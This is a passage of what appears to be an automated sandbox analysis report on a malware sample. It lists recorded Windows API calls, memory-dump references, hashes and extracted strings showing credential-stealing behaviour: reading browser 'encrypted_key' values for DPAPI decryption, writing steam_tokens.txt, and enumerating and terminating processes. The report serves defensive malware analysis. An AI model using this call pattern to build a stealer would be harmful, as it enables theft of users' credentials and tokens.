                                • CloseHandle.KERNEL32(00000000), ref: 00C947B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C947C0
                                • CloseHandle.KERNEL32(00000000), ref: 00C947CB
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 92265d8e5ce39c8222fe79c6611a209538cb784a154538f19093e02c5ace0213
                                • Instruction ID: 086740ddd694ab88ea872dfa7de919b02eaaad6f540401b21a3f66890442ba67
                                • Opcode Fuzzy Hash: 92265d8e5ce39c8222fe79c6611a209538cb784a154538f19093e02c5ace0213
                                • Instruction Fuzzy Hash: 5F01967160121D6FEB205B619CCDFEA777CEB0E752F000190F905A5181DF70AE95CA60
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C88435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8846C
                                • lstrlen.KERNEL32(00000000), ref: 00C884B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C884E9
                                • lstrlen.KERNEL32(00000000), ref: 00C884FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8852E
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C8853E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: b463e047efb7716627f6106e872d23ac115d8bfe57cce5ae8e496d0451d59adf
                                • Instruction ID: 2639c175fb543b67c8dfad07909b377f9cc53bb3983e1a626e3a98a58188b4ff
                                • Opcode Fuzzy Hash: b463e047efb7716627f6106e872d23ac115d8bfe57cce5ae8e496d0451d59adf
                                • Instruction Fuzzy Hash: C751F5755002028FDB24EF29D884A5BB7F9EF88304F148419EC56EB609EF30EE49CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9292C
                                • RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C928A9), ref: 00C9294B
                                • RegQueryValueExA.ADVAPI32(00C928A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00C92965
                                • RegCloseKey.ADVAPI32(00C928A9), ref: 00C9296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: e990607b0189c84c3996cfcfd9f18a29cd7cd519352f55375f340b53087c6df6
                                • Instruction ID: 3d894b16fa859963215f0b968f17c14a3a751ff0e2a42d058ffd335ec2f28653
                                • Opcode Fuzzy Hash: e990607b0189c84c3996cfcfd9f18a29cd7cd519352f55375f340b53087c6df6
                                • Instruction Fuzzy Hash: B5012878600319BFD710CBA1DC58EFB7BBCEB09745F104054FE85E7241E6306A088790
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9289C
                                  • Part of subcall function 00C92910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92925
                                  • Part of subcall function 00C92910: RtlAllocateHeap.NTDLL(00000000), ref: 00C9292C
                                  • Part of subcall function 00C92910: RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C928A9), ref: 00C9294B
                                  • Part of subcall function 00C92910: RegQueryValueExA.ADVAPI32(00C928A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00C92965
                                  • Part of subcall function 00C92910: RegCloseKey.ADVAPI32(00C928A9), ref: 00C9296F
                                • RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C89500), ref: 00C928D1
                                • RegQueryValueExA.ADVAPI32(00C89500,0179EAF8,00000000,00000000,00000000,000000FF), ref: 00C928EC
                                • RegCloseKey.ADVAPI32(00C89500), ref: 00C928F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 36c2170977a8fcfc9ec4a9d018bdb58e4cc2c8b6eab8ded3c01ceef6b762629a
                                • Instruction ID: df6095ee3e6ee14f012d0b75d81941d2651efcc97e5f9e164135c28fdc341c78
                                • Opcode Fuzzy Hash: 36c2170977a8fcfc9ec4a9d018bdb58e4cc2c8b6eab8ded3c01ceef6b762629a
                                • Instruction Fuzzy Hash: B801A2B5A00209BFDB10DBA5AD4DEAB776CEB49315F004154FE08E6291DA706A4887A0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00C7723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00C77279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C77280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C772C3
                                • HeapFree.KERNEL32(00000000), ref: 00C772CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00C77329
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 9eb866a4678d9db4c34b5fa3558de2ab89ca36631ee4cb256e960e78d1fb003d
                                • Instruction ID: 3273c86091d04ab484f58016f45560a78ad5d0d6357ab99d45b87e8f787b7a80
                                • Opcode Fuzzy Hash: 9eb866a4678d9db4c34b5fa3558de2ab89ca36631ee4cb256e960e78d1fb003d
                                • Instruction Fuzzy Hash: 2F416C7170570ADBDB20CF6ADC84BAAB3E8EB89305F148669EC6DC7311E631E9109B50
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C79CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C79CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C79D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 06440b906926b52d36d0d1b4e6416ef6ddc2d9627bad22e44c4c8d45f2eb738e
                                • Instruction ID: 4a6044e7f143784736b15df99e2767fec988de46cfcb7040afbc1943b5273835
                                • Opcode Fuzzy Hash: 06440b906926b52d36d0d1b4e6416ef6ddc2d9627bad22e44c4c8d45f2eb738e
                                • Instruction Fuzzy Hash: 6E41AF71A002099FCF21EF65DC45AAEB7B4EFA4314F04C564E929AB252DA30EE05D780
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8EA61
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8EA7A
                                • lstrcat.KERNEL32(?,017988B8), ref: 00C8EA8D
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8EA9F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 847d5954adc3a9d9aed1784dadbe9e9818c6728b3c1b26fca8f696d07797f90e
                                • Instruction ID: 24d13ca8e31b0d01db7d0096f6e91c70051ad9006771cb58e8a76aed81ed50e5
                                • Opcode Fuzzy Hash: 847d5954adc3a9d9aed1784dadbe9e9818c6728b3c1b26fca8f696d07797f90e
                                • Instruction Fuzzy Hash: 9E41BA71910118AFCB55EF64DC45EED77B8FF8D310F008464BA1AA7241DE70AF48AB94
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8ECDF
                                • lstrlen.KERNEL32(00000000), ref: 00C8ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ED1D
                                • lstrlen.KERNEL32(00000000), ref: 00C8ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00C8ED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 69b63e59c1ed42b933b577fdcf3d8b967b1cbc0b6f53497eab468242430313af
                                • Instruction ID: d0f1102389c47f70a65b472edbb4d789c3e9537b8734fe1787a790a90bedaa18
                                • Opcode Fuzzy Hash: 69b63e59c1ed42b933b577fdcf3d8b967b1cbc0b6f53497eab468242430313af
                                • Instruction Fuzzy Hash: EC31A232A111055FC722BB78EC4AA5E7BA8EF95314F09C030F85ADB212DB30DD09A7C5
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00C7140E), ref: 00C79A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00C7140E), ref: 00C79AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00C7140E), ref: 00C79AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00C7140E,00000000,?,?,?,00C7140E), ref: 00C79AE0
                                • LocalFree.KERNEL32(?,?,?,?,00C7140E), ref: 00C79B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00C7140E), ref: 00C79B07
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 3b7113b0635a0d9c52b91cd919fee5f9c5c97f1ee446cf89b1a9e40f7fa81460
                                • Instruction ID: 552007f762de492d623864746341e18143817123a65292c0c7ca8f84fb0e796f
                                • Opcode Fuzzy Hash: 3b7113b0635a0d9c52b91cd919fee5f9c5c97f1ee446cf89b1a9e40f7fa81460
                                • Instruction Fuzzy Hash: 48115171600209AFD720DF69DDC4AAA736CEB09350F108159F915A6180EB70ED04CB64
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95B14
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00C95B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 00C95B89
                                • memmove.MSVCRT(00000000,?,?), ref: 00C95B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: e98fcee51cbf867511a44d39c47925bb8acd00f7a41182c98b9b3965bc33670d
                                • Instruction ID: acac515b4c4296ec142121205d3c6ea36248e815fb5021dde23d225d86109108
                                • Opcode Fuzzy Hash: e98fcee51cbf867511a44d39c47925bb8acd00f7a41182c98b9b3965bc33670d
                                • Instruction Fuzzy Hash: 46416071B006199FCF18DF6CC995AAEBBB5EB88710F158229E919E7784E630DD01CBD0
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D58
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1D5
